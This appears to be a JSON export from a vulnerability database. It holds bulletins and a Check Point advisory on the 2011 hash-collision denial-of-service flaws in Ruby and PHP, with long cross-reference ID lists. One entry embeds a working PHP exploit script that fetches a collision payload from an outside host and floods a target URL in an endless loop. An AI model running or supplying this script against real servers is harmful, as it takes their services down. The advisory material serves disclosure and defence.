"MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0752.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "SUSE_11_4_JETTY5-120215.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "OPENSUSE-2012-128.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6555420CE1", "FEDORA:8FB3320923", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:1605", "RHSA-2012:1606", "RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26126"]}, {"type": "ubuntu", "idList": ["USN-1429-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}], "modified": "2017-11-19T17:56:14", "rev": 2}}, "_object_type": "robots.models.seebug.SeebugBulletin", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"sourceData": "", "status": "details", "history": [], "description": "BUGTRAQ ID: 51198\r\nCVE ID: CVE-2011-4815\r\n\r\nRuby\u4e00\u79cd\u4e3a\u7b80\u5355\u5feb\u6377\u5bf9\u8c61\u5bfc\u5411\u7f16\u7a0b\uff08\u9762\u5411\u5bf9\u8c61\u7a0b\u5e8f\u8bbe\u8ba1\uff09\u800c\u521b\u7684\u811a\u672c\u8bed\u8a00\u3002\r\n\r\nRuby\u5904\u7406\u5728\u54c8\u5e0c\u8868\u5355\u5f20\u8d34\u548c\u66f4\u65b0\u54c8\u5e0c\u8868\u5355\u65f6\uff0c\u54c8\u5e0c\u751f\u6210\u51fd\u6570\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u901a\u8fc7\u5728HTTP POST\u8bf7\u6c42\u4e2d\u53d1\u9001\u7279\u5236\u7684\u8868\u5355\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u9020\u6210\u54c8\u5e0c\u51b2\u7a81\uff0c\u5bfc\u81f4\u8f83\u9ad8\u7684CPU\u6d88\u8017\u3002\n0\nRuby 1.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nYukihiro Matsumoto\r\n------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.ruby-lang.org/", "sourceHref": "", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-26126", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 3, "references": [], "lastseen": "2017-11-19T17:56:13", "published": "2011-12-30T00:00:00", "objectVersion": "1.5", "cvelist": ["CVE-2011-4815"], "id": "SSV:26126", "enchantments_done": [], "modified": "2011-12-30T00:00:00", "title": "Ruby\u54c8\u5e0c\u51b2\u7a81\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-11-19T17:56:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4815"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:VULN:12518", "SECURITYVULNS:DOC:27500"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:583CE20D04", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881137", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:802794", "OPENVAS:870638", "OPENVAS:1361412562310870534", "OPENVAS:1361412562310881191", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310840923", "OPENVAS:1361412562310870638", "OPENVAS:881137", "OPENVAS:840923", "OPENVAS:1361412562310802794", "OPENVAS:1361412562310864786", "OPENVAS:1361412562310121313", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310863681", "OPENVAS:864786", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:881191", "OPENVAS:863921", "OPENVAS:70754", "OPENVAS:870534"]}, {"type": "nessus", "idList": ["UBUNTU_USN-1377-1.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "SUSE_11_4_RUBY-120117.NASL", "ALA_ALAS-2012-35.NASL", "MACOSX_10_7_4.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "DEBIAN_DLA-88.NASL", "FEDORA_2011-17542.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MACOSX_SECUPD2012-002.NASL", "FEDORA_2011-17551.NASL", "6482.PRM", "REDHAT-RHSA-2012-0069.NASL", "SUSE_11_RUBY-187P357-120127.NASL", "GENTOO_GLSA-201412-27.NASL", "SUSE_11_RUBY-187P357-120126.NASL"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118"]}, {"type": "debian", "idList": ["DEBIAN:DLA-88-1:4DC9E", "DEBIAN:DLA-88-1:B6B6B", "DEBIAN:DLA-263-1:BBAC7"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "ubuntu", "idList": ["USN-1377-1"]}, {"type": "gentoo", "idList": ["GLSA-201412-27"]}], "modified": "2017-11-19T17:56:13", "rev": 2}}, "_object_type": "robots.models.seebug.SeebugBulletin", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-11-19T13:26:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4885"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "nessus", "idList": ["PHP_5_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0019.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2012-1262.NASL", "ALA_ALAS-2012-37.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL", "CENTOS_RHSA-2012-0019.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:30071"]}, {"type": "openvas", "idList": ["OPENVAS:881075", "OPENVAS:136141256231070735", "OPENVAS:1361412562310863963", "OPENVAS:864015", "OPENVAS:1361412562310863713", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310870529", "OPENVAS:863740", "OPENVAS:863713", "OPENVAS:864028", "OPENVAS:881149", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310864015", "OPENVAS:881095", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310863735", "OPENVAS:863742", "OPENVAS:1361412562310881095", "OPENVAS:863954", "OPENVAS:1361412562310870539", "OPENVAS:870529", "OPENVAS:863712", "OPENVAS:881226", "OPENVAS:1361412562310863815", "OPENVAS:1361412562310122012", "OPENVAS:870539", "OPENVAS:1361412562310863712", "OPENVAS:881142", "OPENVAS:1361412562310881075", "OPENVAS:863706", "OPENVAS:870542", "OPENVAS:831518", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310863740", "OPENVAS:70735", "OPENVAS:1361412562310870542", "OPENVAS:863735", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310863824", "OPENVAS:863815", "OPENVAS:863963", "OPENVAS:1361412562310881142", "OPENVAS:881119", "OPENVAS:1361412562310120256", "OPENVAS:1361412562310863742", "OPENVAS:863824"]}, {"type": "fedora", "idList": ["FEDORA:6097820D6A", "FEDORA:7706F20CE7", "FEDORA:3EA60213F3", "FEDORA:994FA20B8F", "FEDORA:7F79620D03", "FEDORA:8893F20D13", "FEDORA:4930D21410", "FEDORA:76D5120DE0", "FEDORA:A38F421375", "FEDORA:6D55C20D95", "FEDORA:8CC7E20B55", "FEDORA:3515C213E6"]}, {"type": "redhat", "idList": ["RHSA-2012:0093", "RHSA-2012:0092", "RHSA-2012:0019"]}, {"type": "centos", "idList": ["CESA-2012:0019", "CESA-2012:0092", "CESA-2012:0093"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-037"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12097"]}], "modified": "2017-11-19T13:26:05", "rev": 2}}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-72454", "id": "SSV:72454", "_object_type": "robots.models.seebug.SeebugBulletin", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72454", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "lastseen": "2017-11-19T13:26:05", "references": [], "modified": "2014-07-01T00:00:00", "objectVersion": "1.5", "reporter": "Root", "history": [], "status": "cve,poc", "viewCount": 8, "published": "2014-07-01T00:00:00", "cvelist": ["CVE-2011-4885"], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "title": "PHP Hashtables Denial of Service", "sourceData": "\n \r\n\r\n# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service\r\nExploit\r\n # Date: 1/1/12\r\n # Author: infodox\r\n # Software Link: php.net\r\n #\r\nVersion: 5.3.*\r\n # Tested on: Linux\r\n # CVE : CVE-2011-4885 \r\n\r\nExploit\r\nDownload -- http://infodox.co.cc/Downloads/phpdos.txt \r\n\r\n<?php\r\n/*\r\nPHP 5.3.* Hash Colission DoS Exploit by infodox\r\nOriginal version by itz me (opensc.ws)\r\nCVE-2011-4885\r\n\r\nMirrors List:\r\nhttp://www.exploit-db.com/sploits/hashcollide.txt\r\nhttp://compsoc.nuigalway.ie/~infodox/hashcollide.txt\r\nhttp://jrs-s.net/hashcollide.txt\r\nhttp://www.infodox.co.cc/Downloads/hashcollide.txt\r\n\r\nChanges:\r\nDifferent mirror for hashcollide.txt\r\nNow takes target as a command line argument\r\nStatus message printing\r\n\r\nTwitter: @info_dox\r\nBlog: blog.infodox.co.cc\r\nSite: http://www.infodox.co.cc/\r\n*/\r\n$targ = $argv[1];\r\n$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...\r\nwhile(1) {\r\n echo "firing";\r\n $ch = curl_init("$targ");\r\n curl_setopt($ch, CURLOPT_POSTFIELDS, $x);\r\n curl_exec($ch);\r\n curl_close($ch);\r\n echo "[+] Voly Sent!";\r\n}\r\n?>\n ", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"sourceData": "", "status": "details", "history": [], "description": "BUGTRAQ ID: 51193\r\nCVE ID: CVE-2011-4885\r\n\r\n\r\nPHP 5.3.9\u4e4b\u524d\u7248\u672c\u5728\u8ba1\u7b97\u8868\u5355\u53c2\u6570\u54c8\u5e0c\u503c\u7684\u5b9e\u73b0\u4e0a\u6ca1\u6709\u63d0\u524d\u9650\u5236\u54c8\u5e0c\u51b2\u7a81\uff0c\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u901a\u8fc7\u53d1\u9001\u5c0f\u91cf\u7684\u7279\u5236webform\u8868\u5355\u5f20\u8d34\u5230\u53d7\u5f71\u54cd\u5e94\u7528\u7a0b\u5e8f\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u4f7f\u7528PHP\u7684\u7ad9\u70b9\u5931\u53bb\u54cd\u5e94\u6b63\u5e38\u8bf7\u6c42\u7684\u80fd\u529b\n0\nPHP 5.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.php.net", "sourceHref": "", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-30001", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 12, "references": [], "lastseen": "2017-11-19T17:56:00", "published": "2012-01-01T00:00:00", "objectVersion": "1.5", "cvelist": ["CVE-2011-4885"], "id": "SSV:30001", "enchantments_done": [], "modified": "2012-01-01T00:00:00", "title": "PHP Web\u8868\u5355\u54c8\u5e0c\u51b2\u7a81\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-11-19T17:56:00", "rev": 2}, "dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2012-0019.NASL", "FEDORA_2012-1301.NASL", "FEDORA_2012-1262.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "CENTOS_RHSA-2012-0019.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "MANDRIVA_MDVSA-2011-197.NASL", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "ALA_ALAS-2012-37.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2012-0420.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:30071"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:994FA20B8F", "FEDORA:4930D21410", "FEDORA:8893F20D13", "FEDORA:A38F421375", "FEDORA:76D5120DE0", "FEDORA:3515C213E6", "FEDORA:6097820D6A", "FEDORA:7706F20CE7", "FEDORA:7F79620D03", "FEDORA:6D55C20D95", "FEDORA:8CC7E20B55"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881149", "OPENVAS:1361412562310863740", "OPENVAS:864015", "OPENVAS:1361412562310881226", "OPENVAS:863706", "OPENVAS:1361412562310863815", "OPENVAS:1361412562310120220", "OPENVAS:870542", "OPENVAS:863815", "OPENVAS:1361412562310863963", "OPENVAS:863963", "OPENVAS:1361412562310863824", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310881095", "OPENVAS:881149", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310870539", "OPENVAS:1361412562310864015", "OPENVAS:1361412562310122012", "OPENVAS:1361412562310870529", "OPENVAS:863824", "OPENVAS:863713", "OPENVAS:881119", "OPENVAS:870539", "OPENVAS:881095", "OPENVAS:1361412562310863735", "OPENVAS:1361412562310881142", "OPENVAS:863954", "OPENVAS:870529", "OPENVAS:863740", "OPENVAS:863742", "OPENVAS:1361412562310120256", "OPENVAS:881142", "OPENVAS:1361412562310863954", "OPENVAS:136141256231070735", "OPENVAS:1361412562310881075", "OPENVAS:881226", "OPENVAS:864028", "OPENVAS:136141256231070759", "OPENVAS:1361412562310863713", "OPENVAS:863712", "OPENVAS:70735", "OPENVAS:881075", "OPENVAS:831518", "OPENVAS:863735", "OPENVAS:1361412562310870542", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310863742", "OPENVAS:1361412562310863712"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0019", "CESA-2012:0092"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-037"]}, {"type": "freebsd", "idList": ["D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0019"]}, {"type": "redhat", "idList": ["RHSA-2012:0093", "RHSA-2012:0019", "RHSA-2012:0092"]}], "modified": "2017-11-19T17:56:00", "rev": 2}}, "_object_type": "robots.models.seebug.SeebugBulletin", "immutableFields": [], "cvss2": {}, "cvss3": {}}], "checkpoint_security": [{"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-30T19:07:53", "history": [{"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-01T15:11:44", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-01T15:11:44", "differentElements": ["modified", "published"], "edition": 1}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability 